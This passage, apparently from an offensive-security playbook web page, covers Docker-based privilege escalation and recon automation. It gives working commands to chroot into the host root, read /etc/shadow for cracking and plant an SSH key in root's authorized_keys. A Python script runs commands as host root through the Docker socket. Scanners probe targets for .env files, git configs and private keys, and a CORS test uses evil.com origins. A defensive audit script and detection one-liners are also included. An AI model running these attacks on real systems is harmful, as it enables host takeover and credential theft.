&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Direct chroot to host&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;docker run --rm -v /:/host -it alpine chroot /host /bin/bash
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Read shadow (offline crack)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;docker run --rm -v /etc:/host_etc -it alpine cat /host_etc/shadow
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Inject SSH key&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;docker run --rm -v /root:/host_root -it alpine sh -c &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;mkdir -p /host_root/.ssh &amp;amp;&amp;amp; echo &amp;#39;ssh-rsa AAAA...&amp;#39; &amp;gt; /host_root/.ssh/authorized_keys&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="212-via-docker-socket" &gt;
&lt;div&gt;
&lt;a href="#212-via-docker-socket"&gt;
##
&lt;/a&gt;
21.2 Via Docker Socket
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;If &lt;code&gt;/var/run/docker.sock&lt;/code&gt; is accessible (bind-mounted into the container you are in, or writable by your user on the host), whoever can write to it controls the daemon, and the daemon runs as root on the host:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Check: is the socket present and writable by you?&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;ls -la /var/run/docker.sock
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# From inside a container that has the socket bind-mounted: install a client,&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# then start a second container with the host root mounted and chroot into it&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;apk add docker-cli
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;docker -H unix:///var/run/docker.sock run --rm -v /:/host -it alpine chroot /host /bin/bash
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# No package manager or no network? Talk to the Engine API over the socket directly&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s --unix-socket /var/run/docker.sock http://localhost/containers/json
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="213-prior-privesc-detection" &gt;
&lt;div&gt;
&lt;a href="#213-prior-privesc-detection"&gt;
##
&lt;/a&gt;
21.3 Prior Privesc Detection
&lt;/div&gt;
&lt;/h3&gt;
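&lt;p&gt;Added example, not code from the playbook: the same checks as the shell one-liners in this section, plus an empty-password and a docker-group check, written as a Python audit that can run on the host or be pointed at copied files. The passwd, sudoers and group contents below are constructed samples that show each indicator once; on a live host run it with &lt;code&gt;--live&lt;/code&gt; as root, because /etc/sudoers is mode 0440 and unreadable otherwise.&lt;/p&gt;

```python
import glob
import sys

# Constructed samples (not from a real host): each contains exactly one indicator.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
backdoor::0:0:root:/root:/bin/bash
alice:x:1000:1000:Alice:/home/alice:/bin/bash
"""
SAMPLE_SUDOERS = """Defaults env_reset
root ALL=(ALL:ALL) ALL
%sudo ALL=(ALL:ALL) ALL
# alice ALL=(ALL) NOPASSWD:ALL   (commented out: must not count)
deploy ALL=(ALL) NOPASSWD:ALL
"""
SAMPLE_GROUP = """root:x:0:
docker:x:999:alice,deploy
sudo:x:27:alice
"""


def passwd_entries(text):
    """Yield (user, password_field, uid) for every well-formed passwd line."""
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) == 7 and fields[2].isdigit():
            yield fields[0], fields[1], int(fields[2])


def uid0_accounts(text):
    """Logins that share UID 0 with root: the 'backdoor::0:0' trick from 21.1."""
    return [u for u, _, uid in passwd_entries(text) if uid == 0 and u != "root"]


def empty_password_accounts(text):
    """Accounts whose password field is empty instead of 'x' (no shadow entry needed)."""
    return [u for u, pw, _ in passwd_entries(text) if pw == ""]


def nopasswd_entries(text):
    """Active (uncommented) sudoers lines granting NOPASSWD."""
    return [l.strip() for l in text.splitlines()
            if "NOPASSWD" in l and not l.lstrip().startswith("#")]


def docker_group_members(text):
    """Members of the docker group, each root-equivalent per 21.1."""
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) == 4 and fields[0] == "docker":
            return [m for m in fields[3].split(",") if m]
    return []


def audit(passwd_text, sudoers_text, group_text):
    """Return a list of (severity, finding) tuples; an empty list means nothing flagged."""
    findings = []
    findings += [("HIGH", "extra UID 0 account: " + u) for u in uid0_accounts(passwd_text)]
    findings += [("HIGH", "empty password field: " + u) for u in empty_password_accounts(passwd_text)]
    findings += [("HIGH", "NOPASSWD sudo: " + e) for e in nopasswd_entries(sudoers_text)]
    findings += [("MEDIUM", "docker group member: " + m) for m in docker_group_members(group_text)]
    return findings


def read_or_empty(path):
    """Read a file, treating missing or unreadable (sudoers without root) as empty."""
    try:
        with open(path) as f:
            return f.read()
    except OSError:
        return ""


if __name__ == "__main__":
    if "--live" in sys.argv:
        sudoers = "\n".join(read_or_empty(p) for p in ["/etc/sudoers"] + glob.glob("/etc/sudoers.d/*"))
        results = audit(read_or_empty("/etc/passwd"), sudoers, read_or_empty("/etc/group"))
    else:
        results = audit(SAMPLE_PASSWD, SAMPLE_SUDOERS, SAMPLE_GROUP)
    for severity, finding in results:
        print(f"[{severity}] {finding}")
```

&lt;p&gt;The docker-group finding is only MEDIUM because membership may be legitimate; the point is that every name on that line has the host-root access shown in 21.1, so it belongs in the report either way.&lt;/p&gt;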
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Check suspicious sudoers entries&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;grep &lt;span style="color:#a6d189"&gt;&amp;#34;NOPASSWD&amp;#34;&lt;/span&gt; /etc/sudoers /etc/sudoers.d/*
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Check users with UID 0&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;awk -F: &lt;span style="color:#a6d189"&gt;&amp;#39;$3 == 0 {print $1}&amp;#39;&lt;/span&gt; /etc/passwd
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Check recently added SSH keys&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;stat /root/.ssh/authorized_keys
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;hr&gt;
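&lt;p&gt;Added example for 21.2 above (not the playbook's code): when the socket is reachable but no docker client can be installed (no network, no package manager), the Engine API can be driven over the unix socket with nothing but the Python standard library. Assumptions: the default socket path, an image that is already present on the host (the create call does not pull), and /bin/sh in the host root. demux_logs parses Docker's 8-byte stream-multiplexing header, which is what a non-TTY logs call returns.&lt;/p&gt;

```python
import http.client
import json
import os
import socket
from urllib.parse import urlencode

DOCKER_SOCK = "/var/run/docker.sock"   # assumption: default daemon socket path


class UnixHTTPConnection(http.client.HTTPConnection):
    """HTTPConnection that dials a unix socket instead of a TCP host."""

    def __init__(self, path):
        super().__init__("localhost")
        self.unix_path = path

    def connect(self):
        self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
        self.sock.connect(self.unix_path)


def socket_reachable(path=DOCKER_SOCK):
    """True when the socket exists and this user can read and write it."""
    return os.path.exists(path) and os.access(path, os.R_OK | os.W_OK)


def build_create_payload(shell_cmd, image="alpine", host_root="/host"):
    """ContainerCreate body: bind-mount host / and run shell_cmd chrooted into it."""
    return {
        "Image": image,
        "Cmd": ["chroot", host_root, "/bin/sh", "-c", shell_cmd],
        "HostConfig": {"Binds": ["/:" + host_root]},
        "Tty": False,
    }


def api(method, path, body=None, sock=DOCKER_SOCK):
    """One Engine API round trip; returns (status, raw body bytes)."""
    conn = UnixHTTPConnection(sock)
    data = json.dumps(body).encode() if body is not None else None
    headers = {"Content-Type": "application/json"} if data else {}
    conn.request(method, path, body=data, headers=headers)
    resp = conn.getresponse()
    raw = resp.read()
    conn.close()
    return resp.status, raw


def demux_logs(raw):
    """Split a non-TTY log stream into {1: stdout, 2: stderr}.

    Each frame is an 8-byte header (stream type, three zero bytes, big-endian
    payload length) followed by the payload; a truncated tail is dropped.
    """
    out = {1: b"", 2: b""}
    pos = 0
    while True:
        header = raw[pos:pos + 8]
        if len(header) != 8:
            return out
        size = int.from_bytes(header[4:8], "big")
        out[header[0]] = out.get(header[0], b"") + raw[pos + 8:pos + 8 + size]
        pos += 8 + size


def run_on_host(shell_cmd, image="alpine"):
    """Create, start, wait for, read logs of, and remove a host-root container."""
    status, raw = api("POST", "/containers/create", build_create_payload(shell_cmd, image))
    if status != 201:
        raise RuntimeError(f"create failed ({status}): {raw.decode(errors='replace')}")
    cid = json.loads(raw)["Id"]
    api("POST", "/containers/" + cid + "/start")
    api("POST", "/containers/" + cid + "/wait")
    _, logs = api("GET", "/containers/" + cid + "/logs?" + urlencode({"stdout": 1, "stderr": 1}))
    api("DELETE", "/containers/" + cid)
    return demux_logs(logs)


if __name__ == "__main__":
    if socket_reachable():
        streams = run_on_host("id; hostname; head -c 200 /etc/shadow")
        print(streams[1].decode(errors="replace"), streams[2].decode(errors="replace"))
    else:
        print("docker socket not reachable as this user")
```

&lt;p&gt;This is the same bind-mount-and-chroot idea as the CLI one-liner, expressed as the four API calls the CLI would make. A non-201 on create almost always means the image is not on the host; list what is with &lt;code&gt;api("GET", "/images/json")&lt;/code&gt; and pick one of those instead of pulling.&lt;/p&gt;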
&lt;h2 id="22-python-snippets--automation" &gt;
&lt;div&gt;
&lt;a href="#22-python-snippets--automation"&gt;
#
&lt;/a&gt;
22. PYTHON SNIPPETS &amp;amp; AUTOMATION
&lt;/div&gt;
&lt;/h2&gt;
&lt;h3 id="221-subdomain--port--path-loop" &gt;
&lt;div&gt;
&lt;a href="#221-subdomain--port--path-loop"&gt;
##
&lt;/a&gt;
22.1 Subdomain + Port + Path Loop
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#81c8be"&gt;import&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;requests&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;domains &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; [&lt;span style="color:#a6d189"&gt;&amp;#34;target.com&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;www.target.com&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;api.target.com&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;admin.target.com&amp;#34;&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;ports &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; [&lt;span style="color:#ef9f76"&gt;80&lt;/span&gt;, &lt;span style="color:#ef9f76"&gt;443&lt;/span&gt;, &lt;span style="color:#ef9f76"&gt;8080&lt;/span&gt;, &lt;span style="color:#ef9f76"&gt;8443&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;paths &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; [&lt;span style="color:#a6d189"&gt;&amp;#34;/.env&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/.git/config&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/storage/oauth-private.key&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;/actuator/env&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/wp-json/wp/v2/users&amp;#34;&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; domain &lt;span style="color:#99d1db;font-weight:bold"&gt;in&lt;/span&gt; domains:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; port &lt;span style="color:#99d1db;font-weight:bold"&gt;in&lt;/span&gt; ports:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; scheme &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;https&amp;#34;&lt;/span&gt; &lt;span style="color:#ca9ee6"&gt;if&lt;/span&gt; port &lt;span style="color:#99d1db;font-weight:bold"&gt;in&lt;/span&gt; [&lt;span style="color:#ef9f76"&gt;443&lt;/span&gt;, &lt;span style="color:#ef9f76"&gt;8443&lt;/span&gt;] &lt;span style="color:#ca9ee6"&gt;else&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;http&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; path &lt;span style="color:#99d1db;font-weight:bold"&gt;in&lt;/span&gt; paths:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;try&lt;/span&gt;:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; url &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;scheme&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;://&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;domain&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;:&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;port&lt;span style="color:#a6d189"&gt;}{&lt;/span&gt;path&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; r &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; requests&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;get(url, timeout&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#ef9f76"&gt;5&lt;/span&gt;, verify&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#ef9f76"&gt;False&lt;/span&gt;, allow_redirects&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#ef9f76"&gt;False&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;if&lt;/span&gt; r&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;status_code &lt;span style="color:#99d1db;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;200&lt;/span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;and&lt;/span&gt; &lt;span style="color:#99d1db"&gt;len&lt;/span&gt;(r&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;text) &lt;span style="color:#99d1db;font-weight:bold"&gt;&amp;gt;&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;50&lt;/span&gt;:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#99d1db"&gt;print&lt;/span&gt;(&lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;🔥 &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;url&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt; (&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;r&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;status_code&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;) -&amp;gt; &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;r&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;text[:&lt;span style="color:#ef9f76"&gt;100&lt;/span&gt;]&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;elif&lt;/span&gt; r&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;status_code &lt;span style="color:#99d1db;font-weight:bold"&gt;in&lt;/span&gt; [&lt;span style="color:#ef9f76"&gt;301&lt;/span&gt;, &lt;span style="color:#ef9f76"&gt;302&lt;/span&gt;]:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#99d1db"&gt;print&lt;/span&gt;(&lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;⚠️ &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;url&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt; -&amp;gt; redirect to &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;r&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;headers&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;get(&lt;span style="color:#a6d189"&gt;&amp;#39;Location&amp;#39;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#39;?&amp;#39;&lt;/span&gt;)&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;elif&lt;/span&gt; r&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;status_code &lt;span style="color:#99d1db;font-weight:bold"&gt;in&lt;/span&gt; [&lt;span style="color:#ef9f76"&gt;401&lt;/span&gt;, &lt;span style="color:#ef9f76"&gt;403&lt;/span&gt;]:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#99d1db"&gt;print&lt;/span&gt;(&lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;🔒 &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;url&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt; -&amp;gt; &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;r&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;status_code&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;            &lt;span style="color:#ca9ee6"&gt;except&lt;/span&gt; requests.RequestException:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;                &lt;span style="color:#ca9ee6"&gt;continue&lt;/span&gt;  &lt;span style="color:#737994;font-style:italic"&gt;# timeout, refused, TLS error: next URL&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="222-bulk-cors-test" &gt;
&lt;div&gt;
&lt;a href="#222-bulk-cors-test"&gt;
##
&lt;/a&gt;
22.2 Bulk CORS Test
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;origins &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; [&lt;span style="color:#a6d189"&gt;&amp;#34;https://evil.com&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;null&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;https://target.com.evil.com&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;https://evil.target.com&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;http://localhost&amp;#34;&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; url &lt;span style="color:#99d1db;font-weight:bold"&gt;in&lt;/span&gt; urls:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; origin &lt;span style="color:#99d1db;font-weight:bold"&gt;in&lt;/span&gt; origins:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; r &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; requests&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;get(url, headers&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;{&lt;span style="color:#a6d189"&gt;&amp;#34;Origin&amp;#34;&lt;/span&gt;: origin}, timeout&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#ef9f76"&gt;5&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; acao &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; r&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;headers&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;get(&lt;span style="color:#a6d189"&gt;&amp;#34;Access-Control-Allow-Origin&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; acac &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; r&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;headers&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;get(&lt;span style="color:#a6d189"&gt;&amp;#34;Access-Control-Allow-Credentials&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;if&lt;/span&gt; acao &lt;span style="color:#99d1db;font-weight:bold"&gt;==&lt;/span&gt; origin &lt;span style="color:#99d1db;font-weight:bold"&gt;and&lt;/span&gt; acac &lt;span style="color:#99d1db;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;true&amp;#34;&lt;/span&gt;:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#99d1db"&gt;print&lt;/span&gt;(&lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;🔥 CRITICAL CORS: &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;url&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt; | Origin: &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;origin&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;        &lt;span style="color:#ca9ee6"&gt;elif&lt;/span&gt; acao &lt;span style="color:#99d1db;font-weight:bold"&gt;==&lt;/span&gt; origin:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;            &lt;span style="color:#99d1db"&gt;print&lt;/span&gt;(&lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;⚠️ CORS reflection: &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;url&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt; | Origin: &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;origin&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;        &lt;span style="color:#ca9ee6"&gt;elif&lt;/span&gt; acao &lt;span style="color:#99d1db;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;*&amp;#34;&lt;/span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;and&lt;/span&gt; acac &lt;span style="color:#99d1db;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;true&amp;#34;&lt;/span&gt;:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;            &lt;span style="color:#737994;font-style:italic"&gt;# Misconfigured but not exploitable: browsers refuse credentials with a wildcard ACAO&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;            &lt;span style="color:#99d1db"&gt;print&lt;/span&gt;(&lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;ℹ️ wildcard ACAO with credentials (informational): {url}&amp;#34;&lt;/span&gt;)
